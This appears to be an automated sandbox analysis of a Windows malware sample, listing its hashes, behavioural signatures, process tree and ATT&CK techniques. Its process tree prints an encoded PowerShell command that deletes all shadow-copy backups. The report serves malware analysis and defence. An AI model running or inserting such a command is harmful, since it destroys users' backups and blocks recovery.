Analysis

  • max time kernel
    151s
  • max time network
    130s
  • platform
    windows7_x64
  • resource
    win7-en-20211208
  • submitted
    24-01-2022 01:10

General

  • Target

    bf4079e3f3de0c27dc621da957f15b866f2211c1cab60d99d43420d3e4623e0d.exe

  • Size

    168KB

  • MD5

    7cf0ec8e986c475de7732e29171994b5

  • SHA1

    30d7cc5efde2772389afcfb8061aaff726fbe1e7

  • SHA256

    bf4079e3f3de0c27dc621da957f15b866f2211c1cab60d99d43420d3e4623e0d

  • SHA512

    4f35d16c746618ed52143693827d014e00b2b0550a9d5f70a1fd5a6c0fb2cdd324837e23a4fc90268c4e5fd3bee55bbb727d6ea2cddc146bea0eb21467909cd0

Score
6/10

Malware Config

Signatures

  • Enumerates connected drives 3 TTPs 24 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Drops file in Windows directory 64 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 4 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\bf4079e3f3de0c27dc621da957f15b866f2211c1cab60d99d43420d3e4623e0d.exe
    "C:\Users\Admin\AppData\Local\Temp\bf4079e3f3de0c27dc621da957f15b866f2211c1cab60d99d43420d3e4623e0d.exe"
    1⤵
    • Enumerates connected drives
    • Drops file in Windows directory
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of WriteProcessMemory
    PID:1068
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:700
  • C:\Windows\system32\wbem\unsecapp.exe
    C:\Windows\system32\wbem\unsecapp.exe -Embedding
    1⤵
      PID:640
    • C:\Windows\system32\vssvc.exe
      C:\Windows\system32\vssvc.exe
      1⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:1988

    Network

    MITRE ATT&CK Matrix ATT&CK v6

    Discovery

    Query Registry

    1
    T1012

    Peripheral Device Discovery

    1
    T1120

    System Information Discovery

    1
    T1082

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • memory/700-55-0x000007FEFB591000-0x000007FEFB593000-memory.dmp
      Filesize

      8KB

    • memory/700-57-0x0000000002AC0000-0x0000000002AC2000-memory.dmp
      Filesize

      8KB

    • memory/700-58-0x0000000002AC2000-0x0000000002AC4000-memory.dmp
      Filesize

      8KB

    • memory/700-59-0x0000000002AC4000-0x0000000002AC7000-memory.dmp
      Filesize

      12KB

    • memory/700-56-0x000007FEF2660000-0x000007FEF31BD000-memory.dmp
      Filesize

      11.4MB

    • memory/700-60-0x000000001B790000-0x000000001BA8F000-memory.dmp
      Filesize

      3.0MB

    • memory/700-61-0x0000000002ACB000-0x0000000002AEA000-memory.dmp
      Filesize

      124KB

    • memory/1068-54-0x00000000751B1000-0x00000000751B3000-memory.dmp
      Filesize

      8KB